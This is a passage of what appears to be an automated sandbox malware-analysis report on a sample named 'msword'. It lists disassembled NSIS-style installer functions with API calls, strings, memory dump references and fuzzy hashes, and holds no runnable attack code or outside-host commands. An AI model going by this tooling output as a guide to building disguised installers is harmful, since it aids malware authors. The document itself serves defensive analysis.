                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                            • API String ID: 1641139501-220328614
                                                                            • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                            • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                            • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                            • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                            Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                            Strings
                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                            • String ID: created uninstaller: %d, "%s"
                                                                            • API String ID: 3294113728-3145124454
                                                                            • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                            • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                            • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                            • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                            Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                            • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                            • API String ID: 3734993849-2769509956
                                                                            • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                            • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                            • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                            • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                            Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                            Strings
                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                            • hZ, xrefs: 00402473
                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                            • String ID: hZ$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                            • API String ID: 1033533793-2870239994
                                                                            • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                            • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                            • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                            • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                            Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                            • GetSysColor.USER32(00000000), ref: 00403E00
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                            • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                            • GetSysColor.USER32(?), ref: 00403E2B
                                                                            • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                            • DeleteObject.GDI32(?), ref: 00403E55
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                            • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                            • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                            • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                            Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                              • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                            Strings
                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                            • Exec: command="%s", xrefs: 00402241
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                            • API String ID: 2014279497-3433828417
                                                                            • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                            • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                            • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                            • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                            Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                            • GetMessagePos.USER32 ref: 00404871
                                                                            • ScreenToClient.USER32(?,?), ref: 00404889
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                            • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                            • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                            • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                            Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                            • MulDiv.KERNEL32(00022000,00000064,?), ref: 00403295
                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                            • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                            • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                            • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                            Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                            • wsprintfW.USER32 ref: 00404457
                                                                            • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$@rD
                                                                            • API String ID: 3540041739-1813061909
                                                                            • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                            • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                            • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                            • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                            Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                            • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                            • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":
                                                                            • API String ID: 589700163-165019052
                                                                            • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                            • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                            • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                            • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                            Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1912718029-0
                                                                            • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                            • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                            • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                            • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                            Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
